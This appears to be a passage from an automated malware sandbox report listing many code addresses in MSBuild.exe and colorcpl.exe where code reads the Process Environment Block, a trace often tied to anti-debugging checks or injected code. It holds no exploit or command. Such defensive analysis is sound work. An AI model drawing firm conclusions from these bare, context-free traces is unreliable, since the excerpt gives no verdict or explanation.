Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_01463884 mov eax, dword ptr fs:[00000030h] 7_2_01463884
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_01463884 mov eax, dword ptr fs:[00000030h] 7_2_01463884
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_014290AF mov eax, dword ptr fs:[00000030h] 7_2_014290AF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_0141F0BF mov ecx, dword ptr fs:[00000030h] 7_2_0141F0BF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_0141F0BF mov eax, dword ptr fs:[00000030h] 7_2_0141F0BF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_0141F0BF mov eax, dword ptr fs:[00000030h] 7_2_0141F0BF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_014B8B58 mov eax, dword ptr fs:[00000030h] 7_2_014B8B58
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_01413B7A mov eax, dword ptr fs:[00000030h] 7_2_01413B7A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_01413B7A mov eax, dword ptr fs:[00000030h] 7_2_01413B7A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_014A131B mov eax, dword ptr fs:[00000030h] 7_2_014A131B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_013EDB60 mov ecx, dword ptr fs:[00000030h] 7_2_013EDB60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_013EF358 mov eax, dword ptr fs:[00000030h] 7_2_013EF358
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_013EDB40 mov eax, dword ptr fs:[00000030h] 7_2_013EDB40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_014653CA mov eax, dword ptr fs:[00000030h] 7_2_014653CA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_014653CA mov eax, dword ptr fs:[00000030h] 7_2_014653CA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_014103E2 mov eax, dword ptr fs:[00000030h] 7_2_014103E2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_014103E2 mov eax, dword ptr fs:[00000030h] 7_2_014103E2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_014103E2 mov eax, dword ptr fs:[00000030h] 7_2_014103E2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_014103E2 mov eax, dword ptr fs:[00000030h] 7_2_014103E2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_014103E2 mov eax, dword ptr fs:[00000030h] 7_2_014103E2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_014103E2 mov eax, dword ptr fs:[00000030h] 7_2_014103E2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_013F1B8F mov eax, dword ptr fs:[00000030h] 7_2_013F1B8F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_013F1B8F mov eax, dword ptr fs:[00000030h] 7_2_013F1B8F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_014A138A mov eax, dword ptr fs:[00000030h] 7_2_014A138A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_0149D380 mov ecx, dword ptr fs:[00000030h] 7_2_0149D380
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_0141B390 mov eax, dword ptr fs:[00000030h] 7_2_0141B390
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_01412397 mov eax, dword ptr fs:[00000030h] 7_2_01412397
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_014B5BA5 mov eax, dword ptr fs:[00000030h] 7_2_014B5BA5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_01474257 mov eax, dword ptr fs:[00000030h] 7_2_01474257
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_013EAA16 mov eax, dword ptr fs:[00000030h] 7_2_013EAA16
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_013EAA16 mov eax, dword ptr fs:[00000030h] 7_2_013EAA16
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_0149B260 mov eax, dword ptr fs:[00000030h] 7_2_0149B260
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_0149B260 mov eax, dword ptr fs:[00000030h] 7_2_0149B260
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_014B8A62 mov eax, dword ptr fs:[00000030h] 7_2_014B8A62
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_013F8A0A mov eax, dword ptr fs:[00000030h] 7_2_013F8A0A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_0142927A mov eax, dword ptr fs:[00000030h] 7_2_0142927A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_01403A1C mov eax, dword ptr fs:[00000030h] 7_2_01403A1C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_013E9240 mov eax, dword ptr fs:[00000030h] 7_2_013E9240
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_013E9240 mov eax, dword ptr fs:[00000030h] 7_2_013E9240
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_013E9240 mov eax, dword ptr fs:[00000030h] 7_2_013E9240
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_013E9240 mov eax, dword ptr fs:[00000030h] 7_2_013E9240
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_01412ACB mov eax, dword ptr fs:[00000030h] 7_2_01412ACB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_013FAAB0 mov eax, dword ptr fs:[00000030h] 7_2_013FAAB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_013FAAB0 mov eax, dword ptr fs:[00000030h] 7_2_013FAAB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_013E52A5 mov eax, dword ptr fs:[00000030h] 7_2_013E52A5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_013E52A5 mov eax, dword ptr fs:[00000030h] 7_2_013E52A5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_013E52A5 mov eax, dword ptr fs:[00000030h] 7_2_013E52A5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_013E52A5 mov eax, dword ptr fs:[00000030h] 7_2_013E52A5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_013E52A5 mov eax, dword ptr fs:[00000030h] 7_2_013E52A5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_01412AE4 mov eax, dword ptr fs:[00000030h] 7_2_01412AE4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_0141D294 mov eax, dword ptr fs:[00000030h] 7_2_0141D294
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_0141D294 mov eax, dword ptr fs:[00000030h] 7_2_0141D294
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_0141FAB0 mov eax, dword ptr fs:[00000030h] 7_2_0141FAB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_01423D43 mov eax, dword ptr fs:[00000030h] 7_2_01423D43
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_01463540 mov eax, dword ptr fs:[00000030h] 7_2_01463540
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_013F3D34 mov eax, dword ptr fs:[00000030h] 7_2_013F3D34
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_013F3D34 mov eax, dword ptr fs:[00000030h] 7_2_013F3D34
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_013F3D34 mov eax, dword ptr fs:[00000030h] 7_2_013F3D34
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_013F3D34 mov eax, dword ptr fs:[00000030h] 7_2_013F3D34
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_013F3D34 mov eax, dword ptr fs:[00000030h] 7_2_013F3D34
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_013F3D34 mov eax, dword ptr fs:[00000030h] 7_2_013F3D34
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_013F3D34 mov eax, dword ptr fs:[00000030h] 7_2_013F3D34
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_013F3D34 mov eax, dword ptr fs:[00000030h] 7_2_013F3D34
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_013F3D34 mov eax, dword ptr fs:[00000030h] 7_2_013F3D34
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_013F3D34 mov eax, dword ptr fs:[00000030h] 7_2_013F3D34
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_013F3D34 mov eax, dword ptr fs:[00000030h] 7_2_013F3D34
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_013F3D34 mov eax, dword ptr fs:[00000030h] 7_2_013F3D34
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_013F3D34 mov eax, dword ptr fs:[00000030h] 7_2_013F3D34
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_013EAD30 mov eax, dword ptr fs:[00000030h] 7_2_013EAD30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_01407D50 mov eax, dword ptr fs:[00000030h] 7_2_01407D50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_0140C577 mov eax, dword ptr fs:[00000030h] 7_2_0140C577
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_0140C577 mov eax, dword ptr fs:[00000030h] 7_2_0140C577
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_0146A537 mov eax, dword ptr fs:[00000030h] 7_2_0146A537
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_01414D3B mov eax, dword ptr fs:[00000030h] 7_2_01414D3B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_01414D3B mov eax, dword ptr fs:[00000030h] 7_2_01414D3B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_01414D3B mov eax, dword ptr fs:[00000030h] 7_2_01414D3B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_014B8D34 mov eax, dword ptr fs:[00000030h] 7_2_014B8D34
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_013E2D8A mov eax, dword ptr fs:[00000030h] 7_2_013E2D8A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_013E2D8A mov eax, dword ptr fs:[00000030h] 7_2_013E2D8A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_013E2D8A mov eax, dword ptr fs:[00000030h] 7_2_013E2D8A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_013E2D8A mov eax, dword ptr fs:[00000030h] 7_2_013E2D8A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_013E2D8A mov eax, dword ptr fs:[00000030h] 7_2_013E2D8A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_01498DF1 mov eax, dword ptr fs:[00000030h] 7_2_01498DF1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_01412581 mov eax, dword ptr fs:[00000030h] 7_2_01412581
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_01412581 mov eax, dword ptr fs:[00000030h] 7_2_01412581
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_01412581 mov eax, dword ptr fs:[00000030h] 7_2_01412581
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_01412581 mov eax, dword ptr fs:[00000030h] 7_2_01412581
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_0141FD9B mov eax, dword ptr fs:[00000030h] 7_2_0141FD9B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_0141FD9B mov eax, dword ptr fs:[00000030h] 7_2_0141FD9B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_013FD5E0 mov eax, dword ptr fs:[00000030h] 7_2_013FD5E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_013FD5E0 mov eax, dword ptr fs:[00000030h] 7_2_013FD5E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_014135A1 mov eax, dword ptr fs:[00000030h] 7_2_014135A1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_01411DB5 mov eax, dword ptr fs:[00000030h] 7_2_01411DB5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_01411DB5 mov eax, dword ptr fs:[00000030h] 7_2_01411DB5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_01411DB5 mov eax, dword ptr fs:[00000030h] 7_2_01411DB5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_0141A44B mov eax, dword ptr fs:[00000030h] 7_2_0141A44B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_0147C450 mov eax, dword ptr fs:[00000030h] 7_2_0147C450
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_0147C450 mov eax, dword ptr fs:[00000030h] 7_2_0147C450
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_0140746D mov eax, dword ptr fs:[00000030h] 7_2_0140746D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_014B740D mov eax, dword ptr fs:[00000030h] 7_2_014B740D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_014B740D mov eax, dword ptr fs:[00000030h] 7_2_014B740D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_014B740D mov eax, dword ptr fs:[00000030h] 7_2_014B740D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_014A1C06 mov eax, dword ptr fs:[00000030h] 7_2_014A1C06
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_014A1C06 mov eax, dword ptr fs:[00000030h] 7_2_014A1C06
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_014A1C06 mov eax, dword ptr fs:[00000030h] 7_2_014A1C06
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_014A1C06 mov eax, dword ptr fs:[00000030h] 7_2_014A1C06
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_014A1C06 mov eax, dword ptr fs:[00000030h] 7_2_014A1C06
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_014A1C06 mov eax, dword ptr fs:[00000030h] 7_2_014A1C06
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_014A1C06 mov eax, dword ptr fs:[00000030h] 7_2_014A1C06
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_014A1C06 mov eax, dword ptr fs:[00000030h] 7_2_014A1C06
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_014A1C06 mov eax, dword ptr fs:[00000030h] 7_2_014A1C06
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_014A1C06 mov eax, dword ptr fs:[00000030h] 7_2_014A1C06
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_014A1C06 mov eax, dword ptr fs:[00000030h] 7_2_014A1C06
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_014A1C06 mov eax, dword ptr fs:[00000030h] 7_2_014A1C06
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_014A1C06 mov eax, dword ptr fs:[00000030h] 7_2_014A1C06
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_014A1C06 mov eax, dword ptr fs:[00000030h] 7_2_014A1C06
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_01466C0A mov eax, dword ptr fs:[00000030h] 7_2_01466C0A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_01466C0A mov eax, dword ptr fs:[00000030h] 7_2_01466C0A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_01466C0A mov eax, dword ptr fs:[00000030h] 7_2_01466C0A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_01466C0A mov eax, dword ptr fs:[00000030h] 7_2_01466C0A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_0141BC2C mov eax, dword ptr fs:[00000030h] 7_2_0141BC2C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_014B8CD6 mov eax, dword ptr fs:[00000030h] 7_2_014B8CD6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_013F849B mov eax, dword ptr fs:[00000030h] 7_2_013F849B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_014A14FB mov eax, dword ptr fs:[00000030h] 7_2_014A14FB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_01466CF0 mov eax, dword ptr fs:[00000030h] 7_2_01466CF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_01466CF0 mov eax, dword ptr fs:[00000030h] 7_2_01466CF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_01466CF0 mov eax, dword ptr fs:[00000030h] 7_2_01466CF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_013E4F2E mov eax, dword ptr fs:[00000030h] 7_2_013E4F2E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_013E4F2E mov eax, dword ptr fs:[00000030h] 7_2_013E4F2E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_014B8F6A mov eax, dword ptr fs:[00000030h] 7_2_014B8F6A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_014B070D mov eax, dword ptr fs:[00000030h] 7_2_014B070D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_014B070D mov eax, dword ptr fs:[00000030h] 7_2_014B070D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_0141A70E mov eax, dword ptr fs:[00000030h] 7_2_0141A70E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_0141A70E mov eax, dword ptr fs:[00000030h] 7_2_0141A70E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_0140F716 mov eax, dword ptr fs:[00000030h] 7_2_0140F716
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_0147FF10 mov eax, dword ptr fs:[00000030h] 7_2_0147FF10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_0147FF10 mov eax, dword ptr fs:[00000030h] 7_2_0147FF10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_013FFF60 mov eax, dword ptr fs:[00000030h] 7_2_013FFF60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_0141E730 mov eax, dword ptr fs:[00000030h] 7_2_0141E730
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_013FEF40 mov eax, dword ptr fs:[00000030h] 7_2_013FEF40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_013F8794 mov eax, dword ptr fs:[00000030h] 7_2_013F8794
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_014237F5 mov eax, dword ptr fs:[00000030h] 7_2_014237F5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_01467794 mov eax, dword ptr fs:[00000030h] 7_2_01467794
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_01467794 mov eax, dword ptr fs:[00000030h] 7_2_01467794
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_01467794 mov eax, dword ptr fs:[00000030h] 7_2_01467794
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_013EE620 mov eax, dword ptr fs:[00000030h] 7_2_013EE620
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_0140AE73 mov eax, dword ptr fs:[00000030h] 7_2_0140AE73
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_0140AE73 mov eax, dword ptr fs:[00000030h] 7_2_0140AE73
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_0140AE73 mov eax, dword ptr fs:[00000030h] 7_2_0140AE73
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_0140AE73 mov eax, dword ptr fs:[00000030h] 7_2_0140AE73
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_0140AE73 mov eax, dword ptr fs:[00000030h] 7_2_0140AE73
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_013EC600 mov eax, dword ptr fs:[00000030h] 7_2_013EC600
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_013EC600 mov eax, dword ptr fs:[00000030h] 7_2_013EC600
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_013EC600 mov eax, dword ptr fs:[00000030h] 7_2_013EC600
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_01418E00 mov eax, dword ptr fs:[00000030h] 7_2_01418E00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_013F766D mov eax, dword ptr fs:[00000030h] 7_2_013F766D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_0141A61C mov eax, dword ptr fs:[00000030h] 7_2_0141A61C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_0141A61C mov eax, dword ptr fs:[00000030h] 7_2_0141A61C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_0149FE3F mov eax, dword ptr fs:[00000030h] 7_2_0149FE3F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_013F7E41 mov eax, dword ptr fs:[00000030h] 7_2_013F7E41
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_013F7E41 mov eax, dword ptr fs:[00000030h] 7_2_013F7E41
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_013F7E41 mov eax, dword ptr fs:[00000030h] 7_2_013F7E41
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_013F7E41 mov eax, dword ptr fs:[00000030h] 7_2_013F7E41
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_013F7E41 mov eax, dword ptr fs:[00000030h] 7_2_013F7E41
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_013F7E41 mov eax, dword ptr fs:[00000030h] 7_2_013F7E41
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_01428EC7 mov eax, dword ptr fs:[00000030h] 7_2_01428EC7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_0149FEC0 mov eax, dword ptr fs:[00000030h] 7_2_0149FEC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_014136CC mov eax, dword ptr fs:[00000030h] 7_2_014136CC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_014B8ED6 mov eax, dword ptr fs:[00000030h] 7_2_014B8ED6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_014116E0 mov ecx, dword ptr fs:[00000030h] 7_2_014116E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_0147FE87 mov eax, dword ptr fs:[00000030h] 7_2_0147FE87
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_013F76E2 mov eax, dword ptr fs:[00000030h] 7_2_013F76E2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_014646A7 mov eax, dword ptr fs:[00000030h] 7_2_014646A7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_014B0EA5 mov eax, dword ptr fs:[00000030h] 7_2_014B0EA5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_014B0EA5 mov eax, dword ptr fs:[00000030h] 7_2_014B0EA5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_014B0EA5 mov eax, dword ptr fs:[00000030h] 7_2_014B0EA5
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_0444A44B mov eax, dword ptr fs:[00000030h] 15_2_0444A44B
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_04430050 mov eax, dword ptr fs:[00000030h] 15_2_04430050
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_04430050 mov eax, dword ptr fs:[00000030h] 15_2_04430050
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_044AC450 mov eax, dword ptr fs:[00000030h] 15_2_044AC450
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_044AC450 mov eax, dword ptr fs:[00000030h] 15_2_044AC450
